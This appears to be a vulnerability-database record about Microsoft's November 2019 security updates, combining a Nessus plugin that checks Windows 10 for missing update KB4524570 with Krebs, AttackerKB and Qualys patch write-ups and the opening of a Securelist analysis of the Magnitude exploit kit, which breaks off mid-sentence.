\"CVE-2019-0719\",\n \"CVE-2019-0721\",\n \"CVE-2019-1309\",\n \"CVE-2019-1310\",\n \"CVE-2019-1324\",\n \"CVE-2019-1374\",\n \"CVE-2019-1380\",\n \"CVE-2019-1381\",\n \"CVE-2019-1382\",\n \"CVE-2019-1384\",\n \"CVE-2019-1385\",\n \"CVE-2019-1388\",\n \"CVE-2019-1390\",\n \"CVE-2019-1391\",\n \"CVE-2019-1393\",\n \"CVE-2019-1394\",\n \"CVE-2019-1395\",\n \"CVE-2019-1396\",\n \"CVE-2019-1397\",\n \"CVE-2019-1398\",\n \"CVE-2019-1399\",\n \"CVE-2019-1405\",\n \"CVE-2019-1406\",\n \"CVE-2019-1408\",\n \"CVE-2019-1409\",\n \"CVE-2019-1411\",\n \"CVE-2019-1413\",\n \"CVE-2019-1415\",\n \"CVE-2019-1416\",\n \"CVE-2019-1417\",\n \"CVE-2019-1418\",\n \"CVE-2019-1419\",\n \"CVE-2019-1420\",\n \"CVE-2019-1422\",\n \"CVE-2019-1423\",\n \"CVE-2019-1424\",\n \"CVE-2019-1426\",\n \"CVE-2019-1427\",\n \"CVE-2019-1428\",\n \"CVE-2019-1429\",\n \"CVE-2019-1430\",\n \"CVE-2019-1433\",\n \"CVE-2019-1435\",\n \"CVE-2019-1436\",\n \"CVE-2019-1437\",\n \"CVE-2019-1438\",\n \"CVE-2019-1439\",\n \"CVE-2019-1440\",\n \"CVE-2019-1454\",\n \"CVE-2019-1456\",\n \"CVE-2019-11135\"\n );\n script_xref(name:\"MSKB\", value:\"4524570\");\n script_xref(name:\"MSFT\", value:\"MS19-4524570\");\n\n script_name(english:\"KB4524570: Windows 10 Version 1903 and Windows 10 Version 1909 November 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4524570. \nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists when\n Windows Netlogon improperly handles a secure\n communications channel. An attacker who successfully\n exploited the vulnerability could downgrade aspects of\n the connection allowing for further modification of the\n transmission. (CVE-2019-1424)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-11135)\n\n - An information disclosure vulnerability exists in the\n way Windows Error Reporting (WER) handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2019-1374)\n\n - A local elevation of privilege vulnerability exists in\n how splwow64.exe handles certain calls. An attacker who\n successfully exploited the vulnerability could elevate\n privileges on an affected system from low-integrity to\n medium-integrity. This vulnerability by itself does not\n allow arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability (such as a remote\n code execution vulnerability or another elevation of\n privilege vulnerability) that is capable of leveraging\n the elevated privileges when code execution is\n attempted. The security update addresses the\n vulnerability by ensuring splwow64.exe properly handles\n these calls.. (CVE-2019-1380)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1436, CVE-2019-1440)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2019-1429)\n\n - A remote code execution vulnerability exists when\n Windows Media Foundation improperly parses specially\n crafted QuickTime media files. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. Users whose accounts\n are configured to have fewer user rights on the system\n could be less impacted than users who operate with\n administrative user rights. (CVE-2019-1430)\n\n - A security feature bypass vulnerability exists where a\n NETLOGON message is able to obtain the session key and\n sign messages. (CVE-2019-1384)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2019-1454)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read the contents of a log file on disk.\n (CVE-2019-1418)\n\n - An elevation of privilege vulnerability exists in the\n Windows Certificate Dialog when it does not properly\n enforce user privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2019-1388)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles IPv6 flowlabel\n filled in packets. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1324)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-12207,\n CVE-2019-1391)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1393, CVE-2019-1394,\n CVE-2019-1395, CVE-2019-1396, CVE-2019-1408)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2019-1415)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2019-1397, CVE-2019-1398)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V Network Switch on a host server fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-0719, CVE-2019-0721)\n\n - An information disclosure vulnerability exists when\n DirectWrite improperly discloses the contents of its\n memory. An attacker who successfully exploited the\n vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how DirectWrite handles objects in memory.\n (CVE-2019-1411)\n\n - An information disclosure vulnerability exists when the\n Windows Servicing Stack allows access to unprivileged\n file locations. An attacker who successfully exploited\n the vulnerability could potentially access unauthorized\n files. (CVE-2019-1381)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1390)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1439)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1406)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly allows COM object creation. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2019-1405)\n\n - An elevation of privilege vulnerability exists in the\n way that the StartTileData.dll handles file creation in\n protected locations. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1423)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Network Switch on a host server fails to\n properly validate input from a privileged user on a\n guest operating system. An attacker who successfully\n exploited the vulnerability could cause the host server\n to crash. (CVE-2019-0712, CVE-2019-1309, CVE-2019-1310)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles specially crafted OpenType\n fonts. For all systems except Windows 10, an attacker\n who successfully exploited the vulnerability could\n execute code remotely. For systems running Windows 10,\n an attacker who successfully exploited the vulnerability\n could execute code in an AppContainer sandbox context\n with limited privileges and capabilities. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n There are multiple ways an attacker could exploit the\n vulnerability, such as by either convincing a user to\n open a specially crafted document, or by convincing a\n user to visit a webpage that contains specially crafted\n embedded OpenType fonts. The update addresses the\n vulnerability by correcting how the Windows Adobe Type\n Manager Library handles OpenType fonts. (CVE-2019-1419,\n CVE-2019-1456)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V on a host server fails to properly validate\n input from a privileged user on a guest operating\n system. (CVE-2019-1399)\n\n - An elevation of privilege vulnerability exists when the\n Windows Data Sharing Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Data Sharing Service\n handles file operations. (CVE-2019-1417)\n\n - An elevation of privilege vulnerability exists when\n ActiveX Installer service may allow access to files\n without proper authentication. An attacker who\n successfully exploited the vulnerability could\n potentially access unauthorized files. (CVE-2019-1382)\n\n - An information disclosure vulnerability exists when the\n Windows Remote Procedure Call (RPC) runtime improperly\n initializes objects in memory. An attacker who\n successfully exploited this vulnerability could obtain\n information to further compromise the users system.\n (CVE-2019-1409)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2019-1433, CVE-2019-1435, CVE-2019-1437,\n CVE-2019-1438)\n\n - An elevation of privilege vulnerability exists in the\n way that the dssvc.dll handles file creation allowing\n for a file overwrite or creation in a secured location.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1420)\n\n - An elevation of privilege vulnerability exists due to a\n race condition in Windows Subsystem for Linux. An\n attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2019-1416)\n\n - An elevation of privilege vulnerability exists in the\n way that the iphlpsvc.dll handles file creation allowing\n for a file overwrite. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2019-1422)\n\n - An elevation of privilege vulnerability exists when the\n Windows AppX Deployment Extensions improperly performs\n privilege management, resulting in access to system\n files. (CVE-2019-1385)\");\n # https://support.microsoft.com/en-us/help/4524570/windows-10-update-kb4524570\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?864f0755\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4524570.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1430\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft UPnP Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-11\";\nkbs = make_list('4524570');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18362\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4524570])\n ||\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"18363\",\n rollup_date:\"11_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4524570])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2019-11-15T18:21:02", "bulletinFamily": "blog", "description": "**Microsoft** today released updates to plug security holes in its software, including patches to fix at least 74 weaknesses in various flavors of **Windows** and programs that run on top of it. The November updates include patches for a zero-day flaw in **Internet Explorer** that is currently being exploited in the wild, as well as a sneaky bug in certain versions of **Office for Mac** that bypasses security protections and was detailed publicly prior to today's patches.\n\nMore than a dozen of the flaws tackled in this month's release are rated \"critical,\" meaning they involve weaknesses that could be exploited to install malware without any action on the part of the user, except for perhaps browsing to a hacked or malicious Web site or opening a booby-trapped file attachment.\n\nPerhaps the most concerning of those critical holes is a zero-day flaw in Internet ~~Exploder~~ Explorer ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)) that has already seen active exploitation. Today's updates also address two other critical vulnerabilities in the same Windows component that handles various [scripting languages](<https://encyclopedia2.thefreedictionary.com/Microsoft+Script+Engine>).\n\nMicrosoft also fixed a flaw in Microsoft Office for Mac ([CVE-2019-1457](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1457>)) that could allow attackers to bypass security protections in some versions of the program.\n\nMacros are bits of computer code that can be embedded into Office files, and malicious macros are frequently used by malware purveyors to compromise Windows systems. Usually, this takes the form of a prompt urging the user to \"enable macros\" once they've opened a booby-trapped Office document delivered via email. Thus, Office has a feature called \"disable all macros without notification.\"\n\n\n\nBut Microsoft says all versions of Office still support an older type of macros that do not respect this setting, and can be used as [a vector for pushing malware](<https://krebsonsecurity.com/2019/02/payroll-provider-gives-extortionists-a-payday/>). **Will Dormann** of the [CERT/CC has reported](<https://kb.cert.org/vuls/id/125336/>) that Office 2016 and 2019 for Mac will fail to prompt the user before executing these older macro types if the \"Disable all macros without notification\" setting is used.\n\nOther Windows applications or components receiving patches for critical flaws today include Microsoft Exchange and Windows Media Player. In addition, Microsoft also patched nine vulnerabilities -- five of them critical -- in the **Windows Hyper-V**, an add-on to the **Windows Server OS** (and **Windows 10 Pro**) that allows users to create and run [virtual machines](<https://azure.microsoft.com/en-us/overview/what-is-a-virtual-machine/>) (other \"guest\" operating systems) from within Windows.\n\nAlthough **Adobe** typically issues patches for its **Flash Player** browser component on Patch Tuesday, this is the second month in a row that Adobe has not released any security updates for Flash. However, Adobe today did push security fixes for a variety of its creative software suites, including [Animate](<https://helpx.adobe.com/security/products/animate/apsb19-34.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb19-36.html>), [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb19-52.html>) and [Bridge](<https://helpx.adobe.com/security/products/bridge/apsb19-53.html>). Also, I neglected to note last month that Adobe released a critical update for **Acrobat/Reader** that [addressed at least 67 bugs](<https://helpx.adobe.com/security/products/acrobat/apsb19-49.html>), so if you've got either of these products installed, please be sure they're patched and up to date.\n\nFinally, **Google** recently fixed a zero-day flaw in its **Chrome** Web browser ([CVE-2019-13720](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>)). If you use Chrome and see an upward-facing arrow to the right of the address bar, you have an update pending; fully closing and restarting the browser should install any available updates.\n\nNow seems like a good time to remind all you **Windows 7** end users that Microsoft will cease shipping security updates after January 2020 (this end-of-life also affects Windows Server 2008 and 2008 R2). While businesses and other volume-license purchasers will [have the option to pay for further fixes](<https://techcommunity.microsoft.com/t5/Windows-IT-Pro-Blog/How-to-get-Extended-Security-Updates-for-eligible-Windows/ba-p/917807>) after that point, all other Windows 7 users who want to stick with Windows will need to consider migrating to **Windows 10** soon.\n\nStandard heads-up: Windows 10 likes to install patches all in one go and reboot your computer on its own schedule. Microsoft doesn\u2019t make it easy for Windows 10 users to change this setting, [but it is possible](<https://www.howtogeek.com/224471/how-to-prevent-windows-10-from-automatically-downloading-updates/>). For all other Windows OS users, if you\u2019d rather be alerted to new updates when they\u2019re available so you can choose when to install them, there\u2019s a setting for that in Windows Update. To get there, click the Windows key on your keyboard and type \u201cwindows update\u201d into the box that pops up.\n\nKeep in mind that while staying up-to-date on Windows patches is a good idea, it's important to make sure you're updating only after you\u2019ve backed up your important data and files. A reliable backup means you\u2019re probably not freaking out when the odd buggy patch causes problems booting the system. So do yourself a favor and backup your files before installing any patches.\n\nAs ever, if you experience glitches or problems installing any of these patches this month, please feel free to leave a comment about it below; there\u2019s a decent chance other readers have experienced the same and may even chime in here with some helpful tips.\n\n**Update, Nov. 13, 11:34 a.m.:** An earlier version of this story misstated some of the findings from CERT/CC, and misspelled the name of the researcher. The above post has been corrected.", "modified": "2019-11-12T22:04:32", "published": "2019-11-12T22:04:32", "id": "KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB", "href": "https://krebsonsecurity.com/2019/11/patch-tuesday-november-2019-edition/", "type": "krebs", "title": "Patch Tuesday, November 2019 Edition", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-07-24T03:27:05", "bulletinFamily": "info", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1426, CVE-2019-1427, CVE-2019-1428.\n\n**Recent assessments:**\n\n**busterb** at 2019-11-19T23:25:29.3873Z reported:\nSince this is being exploited in the wild, and affects a wide range of Internet Explorer versions, it looks like it will have some longterm success in targeted phishing and malvertizing campaigns. IE might be down to just 2% of usage, but it's the only option out of the box on most WIndows Server versions, so it's at least easy-ish to be running a vulnerable version until you can get patches applied or download a different browser first.\r\n\r\nProbably only urgent to patch if you actually use it.\n\nAssessed Attacker Value: 4\n", "modified": "2020-07-24T00:20:44", "published": "2019-01-01T00:00:00", "id": "AKB:0D37CA24-1A96-4579-9FDE-ACADB531AEFE", "href": "https://attackerkb.com/topics/0d37ca24-1a96-4579-9fde-acadb531aefe", "title": "Internet Explorer RCE through scripting engine memory corruption (IE 9, 10, 11)", "type": "attackerkb", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-11-15T18:21:24", "bulletinFamily": "blog", "description": "This month\u2019s Microsoft Patch Tuesday addresses 74 vulnerabilities with 13 of them labeled as Critical. Of the 13 Critical vulns, 5 are for browsers and scripting engines. Out of the 8 remaining Critical vulns, 4 are potential hypervisor escapes in Hyper-V, as well as vulnerabilities in Microsoft Exchange, Win32k, Windows Media Foundations, and OpenType. Adobe's Patch Tuesday was on time this month, and covers 11 vulns spread across Animate, Illustrator, Media Encoder, and Bridge.\n\nUPDATE \nThere are [reports](<https://social.msdn.microsoft.com/Forums/office/en-US/7e7f24cc-f1f3-43f8-a9a2-45b77812b211/the-cve20191402-updates-kb4484119-etc-break-access-201020132016365-query-is-corrupt?forum=accessdev>) that the [CVE-2019-1402](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1402>) patches are causing issues with all supported versions of Microsoft Access. Microsoft has posted a [document](<https://support.office.com/en-us/article/access-error-query-is-corrupt-fad205a5-9fd4-49f1-be83-f21636caedec>) on the issue with upcoming fix dates and workarounds.\n\n### Workstation Patches\n\nScripting Engine, Browser, Win32k, WMF, and OpenType patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\nOne of the Scripting Engine vulnerabilities ([CVE-2019-1429](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429>)) impacting Internet Explorer has been reported by Microsoft as being Actively Attacked in the wild.\n\n### Microsoft Exchange\n\nThere are few details in the security bulletin for the Remote Code Execution vulnerability ([CVE-2019-1373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1373>)) in Microsoft Exchange. The bulletin states that the user must execute PowerShell cmdlets against the Exchange server, but the bulletin does not state what level of privileges are required to exploit. With this being unknown at this time, it is recommended that this patch be prioritized for any Microsoft Exchange servers.\n\n### Hyper-V Hypervisor Escapes\n\nFour remote code execution vulnerabilities ([CVE-2019-1389](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1389>), [CVE-2019-1397](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1397>), [CVE-2019-1398](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1398>), and [CVE-2019-0721](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0721>)) are patched in Hyper-V and Hyper-V Network Switch that would allow an authenticated user on a guest system to run arbitrary code on the host system. Microsoft notes that exploitation of these vulnerabilities is less likely, but these patches should still be prioritized for all Hyper-V systems.\n\n### Guidance on TPM Vulnerability\n\nMicrosoft has also issued a [Security Advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV190024>) on a vulnerability in certain TPM chipsets from STMicroelectronics. The vulnerability impacts key confidentiality in the ECDSA cipher. While there is no vulnerability in Windows itself, a firmware update to the TPM may be needed. The vendor link in the Security Advisory is not pointing the the proper location, but even if manually followed, the [page](<http://www.st.com/tpm-update>) appears to be down at this time.\n\n### Adobe\n\nAdobe's October Patch Tuesday was delayed last month, but covered [Acrobat/Reader](<https://helpx.adobe.com/security/products/acrobat/apsb19-49.html>), [Download Manager](<https://helpx.adobe.com/security/products/adm/apsb19-51.html>), [Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html>), and [Experience Manager Forms](<https://helpx.adobe.com/security/products/aem-forms/apsb19-50.html>). The Acrobat/Reader patches cover 45 critical vulns, and should be prioritized for Workstations with this software installed. The Experience Manager patch also covers one Critical vulnerability. Adobe has ranked the Acrobat/Reader and Experience Manager patches as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the others are ranked as [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nFor November's Patch Tuesday, Adobe has released security patches for [Animate](<https://helpx.adobe.com/security/products/animate/apsb19-34.html>), [Illustrator](<https://helpx.adobe.com/security/products/illustrator/apsb19-36.html>), [Media Encoder](<https://helpx.adobe.com/security/products/media-encoder/apsb19-52.html>), and [Bridge](<https://helpx.adobe.com/security/products/bridge/apsb19-53.html>). The Illustrator patch covers two Critical vulns, while the Media Encoder patch covers one. Adobe has ranked all of these patches as [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).", "modified": "2019-11-12T19:28:42", "published": "2019-11-12T19:28:42", "id": "QUALYSBLOG:91FCE9434FEBAD3E701C317530323FD6", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2019/11/12/november-2019-patch-tuesday-74-vulns-13-critical-actively-attacked-ie-vuln-hyper-v-escapes-adobe", "type": "qualysblog", "title": "November 2019 Patch Tuesday \u2013 74 vulns, 13 Critical, Actively Attacked IE vuln, Hyper-V escapes, Adobe", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "securelist": [{"lastseen": "2020-06-24T11:52:53", "bulletinFamily": "blog", "description": "\n\nExploit kits are not as widespread as they used to be. In the past, they relied on the use of already patched vulnerabilities. Newer and more secure web browsers with automatic updates simply do not allow known vulnerabilities to be exploited. It was very different back in the heyday of Adobe Flash because it's just a plugin for a web browser, meaning that even if the user has an up-to-date browser, there's a non-zero chance that Adobe Flash may still be vulnerable to 1-day exploits. Now that Adobe Flash is about to reach its end-of-life date at the end of this year, it is disabled by default in all web browser and has pretty much been replaced with open standards such as HTML5, WebGL, WebAssembly. The decline of exploit kits can be linked to the decline of Adobe Flash, but exploit kits have not disappeared completely. They have adapted and switched to target users of Internet Explorer without the latest security updates installed.\n\nMicrosoft Edge replaced Internet Explorer as a default web browser with the release of Windows 10 in 2015, but Internet Explorer is still installed for backward compatibility on machines running Windows 10 and it has remained a default web browser for Windows 7/8/8.1. The switch to Microsoft Edge development also meant that Internet Explorer would no longer be actively developed and would only receive vulnerability patches without general security improvements. Still, somehow, Internet Explorer remains a relatively popular web browser. According to [NetMarketShare](<https://netmarketshare.com/?options=%7B%22filter%22%3A%7B%22%24and%22%3A%5B%7B%22deviceType%22%3A%7B%22%24in%22%3A%5B%22Desktop%2Flaptop%22%5D%7D%7D%5D%7D%2C%22dateLabel%22%3A%22Custom%22%2C%22attributes%22%3A%22share%22%2C%22group%22%3A%22browser%22%2C%22sort%22%3A%7B%22share%22%3A-1%7D%2C%22id%22%3A%22browsersDesktop%22%2C%22dateInterval%22%3A%22Monthly%22%2C%22dateStart%22%3A%222020-04%22%2C%22dateEnd%22%3A%222020-04%22%2C%22segments%22%3A%22-1000%22%7D>), as of April 2020 Internet Explorer is used on 5.45% of desktop computers (for comparison, Firefox accounts for 7.25%, Safari 3.94%, Edge 7.76%). Despite the security of Internet Explorer being five years behind that of its modern counterparts, it supports a number of legacy script engines. [CVE-2018-8174](<https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/>) is a vulnerability in a legacy VBScript engine that was originally discovered in the wild as an exploited zero-day. The majority of exploit kits quickly adopted it as their primary exploit.\n\nSince the discovery of [CVE-2018-8174](<https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/>) a few more vulnerabilities for Internet Explorer have been discovered as in-the-wild zero-days: CVE-2018-8653, CVE-2019-1367, CVE-2019-1429, and CVE-2020-0674. All of them exploited another legacy component of Internet Explorer \u2013 a [JScript](<https://googleprojectzero.blogspot.com/2017/12/apacolypse-now-exploiting-windows-10-in_18.html>) engine. It felt like it was just a matter of time until exploit kits adopted these new exploits.\n\nExploit kits still play a role in today's threat landscape and continue to evolve. For this blogpost I studied and analyzed the evolution of one of the most sophisticated exploit kits out there \u2013 Magnitude EK \u2013 for a whole year.\n\nThis blogpost in a nutshell:\n\n * Magnitude EK continues to deliver ransomware to Asia Pacific (APAC) countries via malvertising\n * Study of the exploit kit's activity over a period of 12 months shows that Magnitude EK is actively maintained and undergoes continuous development\n * In February this year Magnitude EK switched to an exploit for the more recent vulnerability CVE-2019-1367 in Internet Explorer (originally discovered as an exploited zero-day in the wild)\n * Magnitude EK uses a previously unknown elevation of privilege exploit for CVE-2018-8641 developed by a prolific exploit writer\n\n## Introduction\n\nMagnitude EK is one of the longest-standing exploit kits. It was on offer in underground forums from [2013](<https://malware.dontneedcoffee.com/2014/02/and-real-name-of-magnitude-is.html>) and later became a private exploit kit. As well as a change of actors, the exploit kit has switched its focus to deliver ransomware to users from specific [Asia Pacific](<https://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/>) (APAC) countries via malvertising.\n\n_Active attacks by Magnitude EK in 2019 according to Kaspersky Security Network (KSN) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/23085939/sl_magnitude_exploit_kit_01-en-2019.png>))_\n\n_Active attacks by Magnitude EK in 2020 according to Kaspersky Security Network (KSN) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/06/23090011/sl_magnitude_exploit_kit_02-en-2020.png>))_\n\nOur statistic shows that this campaign continues to target APAC countries to this day and during the year in question Magnitude EK always used its own ransomware as a final payload.\n\n### Infection vector\n\nLike the majority of exploit kits out there, in 2019 Magnitude EK used [CVE-2018-8174](<https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/>). However, the attackers behind Magnitude EK were one of the first to adopt the much newer vulnerability [CVE-2019-1367](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1367>) and they have been using it as their primary exploit since February 11, 2020. As was the case with CVE-2018-8174, they didn't develop their own exploit for CVE-2019-1367, instead reusing the original zero-day and modifying it with their own shellcode and 